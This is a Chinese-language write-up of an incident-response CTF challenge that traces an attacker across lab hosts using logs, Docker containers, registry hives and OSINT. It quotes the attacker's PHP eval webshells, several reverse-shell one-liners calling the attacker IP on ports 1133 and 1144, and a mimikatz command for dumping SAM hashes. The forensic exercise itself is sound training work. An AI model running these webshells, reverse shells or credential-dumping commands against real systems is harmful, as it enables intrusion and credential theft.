Parloo杯应急响应-畸形的爱

简介

1
2
by:第二届"Parloo 杯"CTF 应急响应挑战赛-畸形的爱
压缩包密码:Parloo&zgsfsys&onefox&solar**juyt

网络拓扑

image-20250521155914167

资产清单

主机名 操作系统登录 服务登录
WebServer root/root webserver/webserver
SQL服务器 sql/sql
Windows7 PC1 administrator/wmx666
Windows10 PC2 administrator/zjl@123

应急响应题目

1.攻击者ip地址1:

image-20250521165704041 登录root用户,查看历史命令,启动了nginx服务,查看nginx日志 过滤发现192.168.31.240大量访问a.php,定位到a.php为一句话木马 image-20250521170006504

1
故攻击者IP为192.168.31.240

2.攻击者ip地址2:

历史命令发现存在docker服务 image-20250521171429472

靶机给到我们是挂起状态,我们启动时由于架构问题需要重新启动,故手动启动容器

1
2
跟进容器网页目录存在clean.sh程序,查看发现反弹shell
192.168.31.11

3.暴力破解开始时间:

docker logs 6801404902b1|grep 192.168.31.240 查看8080服务日志 image-20250521181505685

1
2025:03:05:58

4.flag1:

image-20250521173341481 在PC2中存在everythins直接全局搜 在Tasks中搜到flag1

1
palu{pc3_zgsfqwerlkssaw}

5.flag2:

image-20250521173737215

1
2
3
在flag1中存在C:\Program Files (x86)\Microsoft\a.bat
跟进得到
palu{nizhidaowoyouduoainima}

6.flag3:

image-20250521172939771 在/var/www/html首页中获得到数据库账号密码 8080服务刚好为phpmyadmin跟进库看是否存在 在id14中发现flag3 image-20250521173151447

1
palu{sqlaabbccsbwindows}

钓鱼文件的哈希32位大写

image-20250521173920217image-20250521174230068 image-20250521174456249

2977CDAB8F3EE5EFDDAE61AD9F6CF203

7.webshell密码1:

image-20250521172128969

1
2
3
4
在8061服务日志下过滤POST定位到/uploads/shell.php
跟进得到内容
<?php eval($_POST['hack']); ?>
故为hack

8.webshell密码2:

由1可得

1
2
3
/var/www/html/a.php
<?php eval($_POST[00232]); ?>
故为00232

9.攻击者开放端口(1,2,3)

由题二已知8061端口存在clean.sh image-20250521182837811

1
2
3
4
echo 'OK';
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.31.11 1133 >/tmp/f
nc -c sh 192.168.31.11 1133
sh -i >& /dev/tcp/192.168.31.11/1133

image-20250521183052299

有可能是重启了靶机的原因还是 不存在/tmp/.sh 直接取证镜像

image-20250521183833864

1
/bin/bash -i >& /dev/tcp/192.168.31.11/1144 0>&1

查看PC1端口连接情况 image-20250521180729615

1
1133,1144,8084

10.隐藏账户的密码:

PC2中存在隐藏用户

image-20250521181836088 导出C:\Windows\System32\config文件夹下的SAM、SYSTEM mimikatz获取ntlm

lsadump::sam /sam:SAM /system:SYSTEM image-20250521182310320 99231b8e9de1d06fb66901d08958caa

1
wmx_love

11.[溯源]攻击者的邮箱:

逆向简历.exe image-20250521175350560

1
2
得到C:\Users\n0k4u\source\repos\Project2\x64\Release\Project2.pdb
直接搜n0k4u用户名搜到github ID

image-20250521175524079 image-20250521180121144

https://api.github.com/users/用户名/events/public

1
2
3
通过https://api.github.com/users/n0k4u/events/public接口
查到邮箱
n0k4u@outlook.com

12.[溯源]flag4:

根据11给的密语搜QQ号得到flag4

image-20250521175701703

1
palu{loveyouibiejv}